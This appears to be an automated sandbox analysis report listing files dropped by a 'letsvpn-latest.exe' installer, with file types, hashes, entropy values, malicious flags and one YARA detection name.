                                                                                                                                                                                                  SHA-256:B015C62C09B4033D0A4CAAE36F3A9804A8CEE2549145E199ADA5A9BF51095E0D
                                                                                                                                                                                                  SHA-512:04F3261ED8D59E5E8455D868CB7CEEF97466FB4FC57A98544024F53C4BA9D935E9441169F0705877CF3578F2EF4FC1B54921E9E15ECC70003C67452AE1393F01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1109536
                                                                                                                                                                                                  Entropy (8bit):5.833531644079543
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:c1WtBetKEfrsial0WV1pqfy+Jp15yKn6Gg:vtBetKEfrsial0WV7215yKn6Gg
                                                                                                                                                                                                  MD5:9D0ED298898601B4BCE156C4B550FBAF
                                                                                                                                                                                                  SHA1:909623F8AE5CEA4527DC4E2C5D1D851F65702148
                                                                                                                                                                                                  SHA-256:491BD0614EBD705E0F7E1E085D30F201F4CD7AD2F886048BD597BFB46449A87C
                                                                                                                                                                                                  SHA-512:07D3B077AB08074EF9E5552180B73521C8E4FAD48A9AAAEED26BE9D1F0F7C8C88CEF211BD65DFF2FB9F8EE0093E40DEF34F6F714EBA562DF41FEB430D5E6B16F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):94240
                                                                                                                                                                                                  Entropy (8bit):5.545893753117987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:h2Ec05j4eAH64rh5fSt5T9nFcI94W83qKv/m+:wlK4eA7mDmW8j/N
                                                                                                                                                                                                  MD5:85898D7A2C1B25CDE3CCB2001B4AFAE4
                                                                                                                                                                                                  SHA1:232A32AED8550D07B36528053A59FD0F7E28C578
                                                                                                                                                                                                  SHA-256:DEB3D361EF42CAC93F602C17B7F3DF6E22CE79D10C111CDD7969BCCC3FDE5B40
                                                                                                                                                                                                  SHA-512:F697C0F5CFA384AC23EFDE1E0F5A2597E1415E3322B3C35983BA8A9A64CE016A241F1834CDC269CE41AB772E9FA227963BE388A6387F8056C451D8F5CF5A4E54
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.83528093665527
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:cOss4wvEmF+4wpwlU+nACUOWe6lWwhqWOHlLf2KQcvBZ9ehfS+ShjmM6IGBkSNdn:cO/PArPq3b2KZBZ6S+ST6nkmn
                                                                                                                                                                                                  MD5:AAEDCF923306F04A5261B75D28B71EA7
                                                                                                                                                                                                  SHA1:58BAB697D7E8E5D578E7CDFF2BDE1DA2CB6B427C
                                                                                                                                                                                                  SHA-256:B254C31C34E91F5FE596E0A7DF41A9EB7D03BFBA37F4A8DC8E978E2C6A55769C
                                                                                                                                                                                                  SHA-512:78D29A03E4EC28D431BB44200DD1CE70080F57D1EF0319A880CCAC890C18198418EFECD778C8E665344DEC83A44809B9AEB14981E2535FE1DDBDEBB21EF46149
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.768445701848389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5qXQfVeSN32XFZWe6lWLMhqWOHlLf2KQcvBZ9Vd/VS+ShjmM6IGBkSHn:5g0VyiwEq3b2KZBZ1/VS+ST6nkMn
                                                                                                                                                                                                  MD5:ACF6193D5511378B7C02C03E00386CD1
                                                                                                                                                                                                  SHA1:7D9E11C2C99A4186E7EF5802BCED72315CAF162A
                                                                                                                                                                                                  SHA-256:1B728D394D07AB1CF12E5F70CD2FC558598F068057DF749980DFA02ACE97BFF7
                                                                                                                                                                                                  SHA-512:2C168D1F7F3B4EBC9FEE54689553858EFDBEEFC770F0B79F3F779951480E4CE64F1ADE20FE6C35708C4F555B8847F613BB6C3B15C577EA46AB72F08A5FFB294E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):80928
                                                                                                                                                                                                  Entropy (8bit):5.896904626678757
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:nGLNpA+N49BVKZUj7uecjqYGBzRuAN8J74zIg/m490sqXz2RgUWEw3qKm/mT:nG6DBduAN8J74zIg/m4HqXz2RgUWEwKw
                                                                                                                                                                                                  MD5:5CE4CBFEC968C625A856438C9E6FB160
                                                                                                                                                                                                  SHA1:9117A4411E22831E4363C92733AE84531FEE5D7C
                                                                                                                                                                                                  SHA-256:0D27592676D964F7F7AB27CA8DCACB7C5B5017A745C4749502BF2227E258859D
                                                                                                                                                                                                  SHA-512:A333D327FDD02BFA0C7EB4CA3A1602F3223ED292EBD5A085C40E6403DAE3DA329B0BA53DB6E7181E3436EB10C73FA247934067EA17025703406FA2773BD01A5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.793372115427383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:i8knfHjuXOQWe6lWihqWOHlLf2KQcvBZ9SGES+ShjmM6IGBkSJO:PAuXO1lq3b2KZBZpES+ST6nkEO
                                                                                                                                                                                                  MD5:4178B66B86ED7539703EC80B6407F0F5
                                                                                                                                                                                                  SHA1:2B1088242E8C5169EB3CAD9399408990119B27D0
                                                                                                                                                                                                  SHA-256:6F015F7F2CCC29F50764D4482E6A3C91B9B4BA1346B76F64438AF0FC544C8D55
                                                                                                                                                                                                  SHA-512:BA87B81AFDAF53FE63C9161D075F5CE4F55C37A0AE967D492695B77E84E18D559B67063D73CD2922D4E1207078D8838A8AF9E424FC8859259A00CC64CCFFD2FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) ARMv7 Thumb, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):906272
                                                                                                                                                                                                  Entropy (8bit):7.132105604057801
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:soXErM5iD28EYQg502GXoU5C0ParRvbLk:tXriD28xj52X7arpk
                                                                                                                                                                                                  MD5:692EAC9101A2F178CCF4F3AC8D4E69A7
                                                                                                                                                                                                  SHA1:6E493B2436892DCCC591EE278B3426DB484DCF8D
                                                                                                                                                                                                  SHA-256:D2CC43A027D8AAA688D846665DF8E24F4D3AFAD8C51BC364C47D7FB8C3E596CD
                                                                                                                                                                                                  SHA-512:4E46AB74F40FB20A64535B97AB2473B8F5FFC91520B8B71A7CCC2F4754DD4A516A37C6E0009F8B9A10323445F8EAF2C042B58ED858B12C3769DA46850AB3D099
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1314848
                                                                                                                                                                                                  Entropy (8bit):6.548345207582786
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:UwDD7AuRNZxBNzFlbZcN16AL9hwYi20TAg7wkPxl:UIDbR1L/m9KYixcWH
                                                                                                                                                                                                  MD5:3FD1AFC37E19603D56A261E4AA8DE93B
                                                                                                                                                                                                  SHA1:AD3573E1D2DDECF1128ED06195B4BC0F3E2C1949
                                                                                                                                                                                                  SHA-256:6010694F42A708F29ADBDC9D9C9C7ADBA1E72827FAC30110591FDB238D16C837
                                                                                                                                                                                                  SHA-512:8DAE7E662234270B555FDCFB77043353441A122D640CCE9B62C310C577967438D47D4FD69BB48A03277313F0A98FC34322EF7082BF8C56CE0D5AD10D647E3E5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1030176
                                                                                                                                                                                                  Entropy (8bit):6.751228097849462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:0BvdKGB6hOsMxCmy+rAnpyAqhTz3RzVNUOxKKoSk:0vdKGBmWNAnpc3Rz1KKoSk
                                                                                                                                                                                                  MD5:77EA9B2FD3A7D8787FB80B32F7162A4A
                                                                                                                                                                                                  SHA1:DAF5B3C6B2EDA96C86BE34B57E77D0021A51543D
                                                                                                                                                                                                  SHA-256:3E7F79471A84B3505B781DDA0BDD33A8F5AD5A18C232D724F7E477D92E252DCF
                                                                                                                                                                                                  SHA-512:B91A084B30ABA93F0F10D4165E654308842BCA4152D13B057025684B2BB2963F272473D5A3BE4E0C0A9A3B4C7A39E3876E87F99869AA09252E6E9E71E6CA0C6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.7465535147228035
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8fH3xC8M83We6lWWhqWOHlLf2KQcvBZ9qxkS+ShjmM6IGBkSP:Wc8M8Ylq3b2KZBZ8kS+ST6nk8
                                                                                                                                                                                                  MD5:06870433B0EE21628CFBE438EDC9B057
                                                                                                                                                                                                  SHA1:F388968FC210531D664090E008A5D44F42931727
                                                                                                                                                                                                  SHA-256:08892141E0429AE283F7AC6B1702572D809828724F812B7AB7F7B248036053E4
                                                                                                                                                                                                  SHA-512:5CFE6C20C192C4FF02A6831B4CE504BEAC64A075008C74503D8EAF3759596CF47346E75B7E98307C441945CA5A24305A34706EFEF5CC68F1B4E9F97126347E85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):139296
                                                                                                                                                                                                  Entropy (8bit):6.203667467899164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:ypMrTPTNy56J4JQSfB6yRkkGvaYhfls6DREtfw6aQ5ck/e:y6PTQ6Ga+BtakGvVEtC1X
                                                                                                                                                                                                  MD5:98FF7764DA6B97CB3B8B26EECA105F71
                                                                                                                                                                                                  SHA1:28F319FD5A81B3B07FD0F329F7FD675A0E557ED0
                                                                                                                                                                                                  SHA-256:A04EBFCC5F4C641EAEF0DA0FCEB4D0AD65E91A636C723B8F5F4F41F1C4C1F2CD
                                                                                                                                                                                                  SHA-512:2D7D578069EB269855611074BEF654E03C7586F6943AD176B61FC4D3A77FC1402AF89E3F276D562951C9BCA72DC4FF40D3A03905947997D10D9CAA3ADBCE62D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113184
                                                                                                                                                                                                  Entropy (8bit):6.538622877633965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:blzhJmad5M+ekPfJFVwKrSDnuP7HCt+/NyIDfEtPsn/j481sOV/L:blzqaHM+eCTrSDuP7ZbEtUnr51sON
                                                                                                                                                                                                  MD5:37C91BE50E2A9A003AA88E3E91A8BE65
                                                                                                                                                                                                  SHA1:5B728E04200CB5FFDB5A7D904C8AAE7A7FB9AC59
                                                                                                                                                                                                  SHA-256:03E6F5D7A82CD0A22FEEB48983044F8664C2DD319C8942518B224CFF26BC7EAD
                                                                                                                                                                                                  SHA-512:949230C263BD106CAC34CBE716EEAFE0181329DB381FA9EA435EEC432EF4F79886BEAFA3CE6DA996931EB2112560ADAD7D69DBFF12311F56196C52CFB427B9D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282103236061246
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k9DGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4eH4Sq3b2KZBZ2S+ST6nki:kVGL8sTfLWRO+rUhrI7UT5DK93qKM/m8
                                                                                                                                                                                                  MD5:4B265A80F0C5DE434A73E76A2B20632C
                                                                                                                                                                                                  SHA1:E1A7664DE00AD7A0B0BF4054E22625FF6FAD7EB2
                                                                                                                                                                                                  SHA-256:C343E533D53557F6F50721F511559FCC94939CB56EEDCAA1E2299CBB2E4D2D14
                                                                                                                                                                                                  SHA-512:35B24E8CEB5310271E8CE12A885F08BE7BA720050837525877FE280893176E379B2EA2DEB47D42E030B2A787C850C58C1AB647E3B3B7DBE9F09FD0E4DE9B3CD4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.251413403033582
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:oGL8sTxyHu6RjvYDGE97we8oEN3qKK/ms:oGhVENm/7
                                                                                                                                                                                                  MD5:80FE3928FBBC68EAE87A7EC53B84CA57
                                                                                                                                                                                                  SHA1:0AECA1C566BA00782820A14B7B262E1191617D5F
                                                                                                                                                                                                  SHA-256:2DB64AE25EFEFC7208DEED114E4AB326C4718A7ADC78BF92642E4F3EDDD18610
                                                                                                                                                                                                  SHA-512:506946BD007C4BFB4777E7A52959CF6E078F6090DE1BCF077A79AAE437CA0F908842C0B89C114D42EB5223B188C3429CB788510B0050ACA92137D1DFE4195BF7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.968045952031746
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:jX3HhVhLu4y8VWe6lWihqWOHlLf2KQcvBZ96I03S+ShjmM6IGBkSF:z3h/aVq3b2KZBZ303S+ST6nkC
                                                                                                                                                                                                  MD5:949581689D35CF1D5EC2D231DAA57041
                                                                                                                                                                                                  SHA1:D6797330D56FBACE397073A8877119BB24F2E83D
                                                                                                                                                                                                  SHA-256:C7B7582C55F44F2DBF7752D181041DE94319DC91CED63031328D2F5A8AAB7C19
                                                                                                                                                                                                  SHA-512:73401AB7C27336C2C0FB284552D5AB2B03F1E0EE410E971FFD684C88D4A36EF213B14A3605B73336050C4B9FD918E7C86CBF8CE26B5F40809D8507BB3567F3B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.963516406614417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:s/wkIv2FCcTWe6lWRhqWOHlLf2KQcvBZ9cPdsmS+ShjmM6IGBkSaq:Sgdsq3b2KZBZO1S+ST6nkvq
                                                                                                                                                                                                  MD5:9CBD975E602B3C1E52CAA03C1EBA9D89
                                                                                                                                                                                                  SHA1:3C32533E5A0221C9A26209ED4936669754BC550C
                                                                                                                                                                                                  SHA-256:3BF3C7DEFE57BF1C243E3424BA02355EE1C0340495ACE2BB082249A3544C1815
                                                                                                                                                                                                  SHA-512:B996ED512BC060AF88E66A6709C92DA9CAF686E4FB9E880139048E9B00A7F3C66A81AA63F589048D1D7EB15DBACAD0BDFEFE247D915C49FBDA322BCDF7F528BB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.2532181397796105
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kGL8sTxyHu6RjvYDGE97we8obd3qK//mY:kGhVbdD/j
                                                                                                                                                                                                  MD5:AF0601979DB922F247B0831F02566455
                                                                                                                                                                                                  SHA1:7496C66A37E8C8919CACB134777F273594EDC8BE
                                                                                                                                                                                                  SHA-256:652607BE33864DC6B89863B879925FCE2700FDC7A1752AD83485BDB956057814
                                                                                                                                                                                                  SHA-512:4156E43D1F04D66C78B3C80A8264B28061F2C052DC59B81023EC3D7D1E7A723A44F981087C5BE2334F2E03E6F4D51EA4275BFDC3CD25E4057D6A570681E9FFEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282322783142791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:pdDGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4e+4oq3b2KZBZlnS+ST6nk5:p1GL8sTfLWRO+rUhrI7UT5DXL3qKT/mn
                                                                                                                                                                                                  MD5:DD3AFD8D30B794AFFA6A3AA81C31AFFD
                                                                                                                                                                                                  SHA1:969BC653E46555ED37482B754677A14FE4629E34
                                                                                                                                                                                                  SHA-256:AC606A00D4CAF0C0485EA9B5647F7104F5E0A13C5A88B8253A265B37ABFCFEBF
                                                                                                                                                                                                  SHA-512:880E508630B075B68A2DF05B7CE0BBDB84FEE427BFB65A8237B43FBDA6BB3BE99599021874DB2A17E56EF7F1AB803BA7A385004FB2EC563857DD9CFD1853654D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.252146524644364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:rGL8sTxyHu6RjvYDGE97we8oRx3qKh/mN:rGhVRxl/+
                                                                                                                                                                                                  MD5:E8F404437EE5E95C3B0971985216778B
                                                                                                                                                                                                  SHA1:F642530C433131B29459EB942C5157FAB7B0B664
                                                                                                                                                                                                  SHA-256:D1EDD534AE26455AEDBC4CB720DEFC618CF669631E6C4EAE66267B91DB625B95
                                                                                                                                                                                                  SHA-512:790F2E5A3D7AE5CA06CAAF58C4CE3EA20A1DE647A537DCCF9235A7BB8841075A5C8FDEB871D495CFC04EEDECD895A8D70B6D2BB24C506143FF6A2CA2775C4599
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101536
                                                                                                                                                                                                  Entropy (8bit):5.597950959538587
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ImYSYxGfIZnRnD6M7EFOUakPhtUn6KXF4O7WfvZt9c:HYFZnRDGdvPXU6K1RW
                                                                                                                                                                                                  MD5:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  SHA1:824F299E8EFD95BECA7DD531A1067BFD5F03B646
                                                                                                                                                                                                  SHA-256:9F45A39015774EEAA2A6218793EDC8E6273EB9F764F3AEDEE5CF9E9CCACDB53F
                                                                                                                                                                                                  SHA-512:FA5CF687EEFD7A85B60C32542F5CB3186E1E835C01063681204B195542105E8718DA2F42F3E1F84DF6B0D49D7EEBAD6CB9855666301E9A1C5573455E25138A8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1429344
                                                                                                                                                                                                  Entropy (8bit):7.9320530592846135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:8XWYAlLlqSmtLvUDSRbm4Jah1rVxzY8Ja1xbLAAAOurzXuV1F+eAXvUS1vlPA:8mYAlLfeTUDBzrVxzYTOTOu3Xu5AX/l4
                                                                                                                                                                                                  MD5:B5A67867CDCE86E09E2625A6FA4D5FEA
                                                                                                                                                                                                  SHA1:C42E6ED280290648BBD59F664008852F4CFE4548
                                                                                                                                                                                                  SHA-256:5E21C85034311C51D8B0367A773D475AF2392B3DDCD90676C61697C6B5FD2E6A
                                                                                                                                                                                                  SHA-512:31D7081BFFEEB5F32457096E51A29236306E5D971DE7EDB80A51188BCCDA9B9F17F0C3593D30828FC140B7A023F5B6842BC922F2023C7B8EA3786C2DBEC40472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100646
                                                                                                                                                                                                  Entropy (8bit):7.0924503598442445
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:CXv9qKohEb1guqeLlt3cgATZ+eWeH+BCwVWWBKx1iv:CXsKoGBxJcgGZ+bVWWBm1k
                                                                                                                                                                                                  MD5:BCAE38E6266524A76A57546527DED8CE
                                                                                                                                                                                                  SHA1:79F3040BAEA4C4987CEDB10D30845F70E9D64B0C
                                                                                                                                                                                                  SHA-256:20A400938F7A953DFBA8F89B03555EA3DACFA9D51F71EA15C35258B722BADACA
                                                                                                                                                                                                  SHA-512:35D37CFD07766A76DE222FAC610379D309073065650398EB9A075CF5CAC23EBF3B4599C712ADCB27162CA49F1BF4B0A2249299AC155938E9744F69F44AF1A125
                                                                                                                                                                                                  Malicious:false
